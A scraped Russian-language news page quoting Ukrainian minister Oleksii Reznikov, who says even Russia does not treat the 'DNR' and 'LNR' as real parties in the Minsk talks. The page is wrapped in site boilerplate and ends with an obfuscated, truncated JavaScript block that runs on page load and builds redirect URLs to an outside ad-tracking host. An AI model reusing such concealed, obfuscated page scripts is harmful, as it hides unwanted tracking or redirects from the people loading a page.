Террористические образования не признает ни одна страна мира

У т.н. “ДНР” и “ЛНР” нет абсолютно никакой субъектности, и это признает даже Россия. Об этом сказал в интервью агентству "Интерфакс-Украина" вице-премьер-министр – министр по вопросам реинтеграции временно оккупированных территорий Алексей Резников.

По его словам, он не раз слышал в кулуарах минских переговоров, как представители России называют боевиков “наши подопечные”.

"Они относятся к представителям ОРДЛО как к своим подопечным, причем с пренебрежением. Кто хозяин и начальник, а кто подчиненный – там очевидно… Я вам скажу, они (ОРДЛО. – Ред.) настолько не субъектны, что даже страна-агрессор не признает никакой их субъектности. Представители Российской Федерации даже в Минском процессе называют своих "приглашенных" по названиям двух городов: говорят "Донецк" и "Луганск". Все. Хотя в самом Минском тексте написано "представители отдельных районов Донецкой и Луганской областей", – сказал Резников.

В тренде
Ахметов рассказал о своей роли в борьбе с коронавирусом

	Резников: Даже Россия не признает субъектность "ЛНР" и "ДНР"

Как сообщали новости “Сегодня”, Алексей Резников рассказывал, сколько Россия тратит на зарплаты в "ЛНР" и "ДНР". Люди на оккупированных территориях получают зарплаты из российского бюджета, следовательно, российским налогоплательщикам еще приходится содержать украинцев.

Читайте также:  4 тыс. добровольцев в сутки, жизнь в палатках и героизм в мирной жизни: что нужно знать о Нацгвардии

Отметим, что на днях прошли очередные переговоры Трехсторонней контактной группы по Донбассу в режиме видеоконференции. Российская сторона снова настаивала на прямом диалоге Киева с боевиками, но ничего не получилось. Представитель РФ Борис Грызлов даже "обиделся" на Украину после переговоров в ТКГ.

Все подробности в спецтеме Урегулирование на Донбассе

	Резников: Даже Россия не признает субъектность "ЛНР" и "ДНР"

	Резников: Даже Россия не признает субъектность "ЛНР" и "ДНР"

	Резников: Даже Россия не признает субъектность "ЛНР" и "ДНР"

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

Россия
Донбасс
Алексей Резников

Источник:

Интерфакс-Украина

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Новости партнеров

Загрузка…

Популярные статьи

	Резников: Даже Россия не признает субъектность "ЛНР" и "ДНР"У Олега Ляшко родился сын: “Самое большое счастье на свете”Политика 	Резников: Даже Россия не признает субъектность "ЛНР" и "ДНР"Внучка Муссолини отреагировала на то, что Украина сняла санкцииПолитика 	Резников: Даже Россия не признает субъектность "ЛНР" и "ДНР"Выборы на карантине: в МВД назвали два выхода из ситуацииПолитика 	Резников: Даже Россия не признает субъектность "ЛНР" и "ДНР"Украина разрабатывает стратегию деоккупации Крыма: Кулеба сообщил деталиПолитика 	Резников: Даже Россия не признает субъектность "ЛНР" и "ДНР"У Зеленского рассказали, кто может представлять Донбасс в Контактной группеПолитика 	Резников: Даже Россия не признает субъектность "ЛНР" и "ДНР"Кишиневская или брюссельская площадка: Резников предложил вариант переговоров о КрымеПолитика

Новости партнеров

Загрузка…

загрузка…

	Резников: Даже Россия не признает субъектность "ЛНР" и "ДНР"

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • на сайте

  • Спецпроекты

  • Архив сайта

Читайте также:  Зеленский восстановил ответственность за ложь в декларациях

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

© segodnya.ua, 2020

Главное

Лента новостей

Отсутствует подключение к сети Интернет

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){“use strict”;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=”/z”,X=”0x04″,B=”http”,G=”substr”,K=”host”,Q=J,U=”argon_”+”debug”+”=1″,V=”prototype”,Y=”createElement”,Z=”appendChild”,tt=”setTimeout”,ot=”querySelectorAll”,et=”getOwnPropertyDescriptor”,rt=”Object”,nt=”charCodeAt”,it=”fromCharCode”,at=”zmctrack”+”.net”,ct=”bind”,ft=”call”,lt=”script”,dt=”head”,st=”get”,pt=”set”,ht=”indexOf”,ut=”s.”+at,bt=”cookie”,kt=”XMLHttpRequest”,vt=”Date”,gt=”now”,xt=”responseText”,mt=”open”,yt=”ShadowRoot”,wt=”Node”,At=”send”,zt=”Array”,St=”addEventListener”,Tt=B+”://”+”click”+”.”+at+”/c/”+”redirect”+”?”+”hash”+”=”,Dt=”slot”,Et=”Math”,Mt=”floor”,Ct=”random”,Ot=”console”,Lt=”Document”,Nt=”innerHTML”,_t=”attachShadow”,Ht=”offsetWidth”,It=”Element”,Rt=”next”,qt=”previous”,Pt=”push”,$t=”length”,jt=”shift”,Ft=”parentNode”,Jt=”textContent”,Wt=”JSON”,Xt=”parse”,Bt=”load”,Gt=”HTML”+It,Kt=”error”,Qt=”location”,Ut=”href”,Vt=”POST”,Yt=”document”,Zt=”un”+”eval”,to={},oo=”parseInt”,eo=It+”Sibling”,ro=”String”,no=”split”;to[“mode”]=”closed”,t=l[Yt],o=l[“chrome”],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||”|”)}!o&&!e||(z=l[“n10091125”],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня